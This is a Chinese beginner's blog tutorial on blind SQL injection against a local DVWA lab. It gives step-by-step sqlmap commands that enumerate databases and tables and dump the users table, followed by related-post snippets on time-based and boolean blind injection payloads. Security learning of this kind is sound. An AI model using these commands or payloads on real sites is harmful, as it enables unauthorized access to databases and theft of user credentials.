我的学习之路(一)SQL盲注学习篇

我的学习之路,现在零基础,是一个小白,请各位大牛批评指正!写下这篇,是对自己的一个思路的整理,仅供参考。

Dvwa中登录进入,首先在DVWA Security中设置等级为low,然后进入SQL Injection(blind),随意输入一个数字进行抓包,然后找到URL注入点和cookie。(抓包使用的工具为fiddler,在此就不进行详述抓包过程了)

然后进入cmd界面进行命令参数输入:

第一步查询该URL是否可进行注入,命令参数如下:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6"

-u参数为指定URL   --cookie="cookie值"

结果发现是可以进行注入的。

第二步查看所有的数据库:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –dbs

第三步查看当前用户:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –current-user

第四步查看数据库dvwa中所有的表:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa --tables

第五步查看数据库中的users表,其中—columns为查看当前表的所有列

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--columns

各位经过前面的步骤是不是等的没有耐心了,哈哈,但是结果出来,还是有成就感的哦。第六步,也就是最后一步,--dump 将所有列的信息都列出来。

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--dump

当然,最后一张图没有截成完整图哦,你可以继续回车的!!

时间: 2024-11-08 22:46:50

我的学习之路(一)SQL盲注学习篇的相关文章

sql盲注学习

information_schema.schemata(schema_name) information_schema.tables(table_name,table_schema) information_schema.columns(column_name,table_name) 盲注与poc编写:https://bbs.ichunqiu.com/thread-31587-1-1.html 基于bool报错的sql注入: 了解sql语句的嵌套与sql常用函数:http://blog.51ct

SQL盲注学习-时间型

本次对时间型盲注进行学习,还是的使用sqli-labs环境. 首先看一下时间型盲注需要用到的: 1.if()函数   if(a,b,c) 如果a为真则执行b,否则执行c.如图,由于1=1为真所以执行第二个参数2: 而当1=11是结果为假,所以执行了第三个参数3: 2.sleep()      sleep函数可以让此语句运行N秒钟 可以看到这句代码执行了5秒钟 接下来查询1=1如果为真的话执行1,为假则执行5秒: 由于1=1为真所以执行查询1,用时0秒,几乎感觉不到延迟:1=2时,则执行第三个字段

【安全牛学习笔记】​手动漏洞挖掘-SQL盲注

手动漏洞挖掘-----SQL盲注 不显示数据库内建的报错信息 内建的报错信息帮助开发人员发现和修复问题 报错信息提供关于系统的大量有用信息 当程序员隐藏了数据库内建报错信息,替换为通用的错误提示,sql注入将 无法依据报错信息判断注入语句的执行结果,即 盲 思路:既然无法基于报错信息判断结果,基于逻辑真假的不同结果来判断 1'and 1=1--+ 1'and 1=2--+ select * from table_name where id='1' orderby 2--'; 课时91 手动漏洞挖

(转)SQL盲注攻击的简单介绍

转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介     1.1 普通SQL注入技术概述     目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:     (1) 脚本注入式的攻击     (2) 恶意用户输入用来影响被执行的SQL脚本     根据Chris Anley的定义[2], 当一个攻击者通过在查询语句中插入一系列的SQL语句来将数据写入到应用程序中,这种方法就可以定义

SQL盲注攻击的简单介绍

1 简介     1.1 普通SQL注入技术概述     目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:     (1) 脚本注入式的攻击     (2) 恶意用户输入用来影响被执行的SQL脚本 根据Chris Anley的定义[2], 当一个攻击者通过在查询语句中插入一系列的SQL语句来将数据写入到应用程序中,这种方法就可以定义成SQL注入.Stephen Kost[3]给出了这种攻击形式的另一个特征,“从一个数据库获得未经授权的访问和直接检索”,SQL注入攻

Web系统常见安全漏洞及解决方案-SQL盲注

关于web安全测试,目前主要有以下几种攻击方法: 1.XSS 2.SQL注入 3.跨目录访问 4.缓冲区溢出 5.cookies修改 6.Htth方法篡改(包括隐藏字段修改和参数修改) 7.CSRF 8.CRLF 9.命令行注入 今天主要讲下SQL盲注. 一.SQL 盲注.发现数据库错误模式.跨站点脚本编制 严重性: 高 类型: 应用程序级别测试 WASC威胁分类: 命令执行类型:SQL 注入 CVE 引用: 不适用 安全风险: 1.      可能会查看.修改或删除数据库条目和表   ---S

【笔记】网易微专业-Web安全工程师-04.WEB安全实战-8.SQL盲注

上一节我们在实战中介绍了SQL注入的原理和危害,这一节我们要实战SQL盲注,与普通的SQL注入相比,数据库返回的结果不会显示在页面上,只会返回成功/失败或者真/假,这无形中加大了我们注入的难度. SQL盲注的一种思路:采用where语句"真and真=真","真and假=假",把我们需要确定的条件放在and之后,当我们的猜测为真那么返回为真,猜测错误则返回为假.具体怎么应用呢?我们在实战中学习. DVWA实战: 1. 打开phpStudy或xampp,运行Apach和

sql盲注

在使用sql语句作为数据库操作方式的系统中,因为程序员处理传入参数不善而导致sql语句功能改变,从而利用这些改变对数据库甚至系统造成信息泄漏.系统破坏的问题成为sql注入. sql盲注是sql注入的一种,它通过传入特殊参数,配合系统接口的正常.异常状态返回,达到对系统以及数据库信息进行猜测的目的. 举个栗子: (1)探测到某个接口,内容如下: http://www.abc.com?a=1&b=2 返回值为 {"state":"1","msg&quo

第九届极客大挑战——Geek Chatroom(sql盲注)

引言:因为太想加入三叶草了,所以极客大挑战这段时间一直在努力的学习,原来还真没想到能在比赛中拿到排行榜第一的成绩,不过现在看来努力始终都是有回报的.但我依然还是比较菜啊-.-,最近却有很多伙伴加我好友,一来就叫我大佬,让我深感有愧-.-,既然都想看我wp,那我就挑几道题写写好了,口拙词劣还望见谅. 首先观察这个web应用的功能,可以任意留言,也可以搜索留言,当然我还用cansina扫描过网站,查看过源码,抓包查看过header等.没发现其他提示的情况下断定这就是个sql注入,可能存在的注入点呢,